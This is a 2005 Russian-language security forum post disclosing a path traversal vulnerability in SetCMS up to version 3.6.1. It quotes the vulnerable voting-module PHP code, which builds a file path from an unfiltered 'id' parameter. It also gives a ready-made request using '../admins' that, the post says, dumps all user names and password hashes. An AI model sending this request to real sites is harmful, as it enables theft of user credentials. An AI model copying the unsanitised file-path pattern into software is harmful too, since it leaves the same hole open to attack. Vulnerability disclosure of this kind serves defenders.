Форум АНТИЧАТ - Взлом SetCMS <= 3.6.1

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.

Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.

⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

Взлом SetCMS <= 3.6.1

18.08.2005, 03:17

madnet

Умиротворенн

Регистрация: 09.12.2004

Сообщений: 996

Провел на форуме:
2386719

Репутация: 1384

Отправить сообщение для madnet с помощью ICQ

Взлом SetCMS <= 3.6.1

Как я и говорил кое что более интересое чем xss

Во всех версиях SetCMS до 3.6.2 обнаружена критическая уязвимость
возможно получение всех паролей пользователей через модуль голосования

\modules\golos\index.php

ошибка в нефильтруемой переменной id

PHP код:


		
			
if ($mc == "viewvote" && isset($_GET['id']))

{

 $votenum = $_GET['id'];

 $file = file("files/polls/$votenum.set");

таким образом, составив такой запрос

Код:

http://target.com/SetCMS/index.php?set=golos&mc=viewrezult&id=../admins

мы получим список всех пользователей и их хэши.

(с) madnet

__________________

http://madnet.name - madnet - blog | homepage (Мысли, релизы, скрипты, софт)

http://antichat.ru - Лучший сайт по безопасности
irc.antichat.ru:7771 #antichat - общение online
ГАРАНТ ФОРУМА

Последний раз редактировалось madnet; 16.01.2006 в 18:38..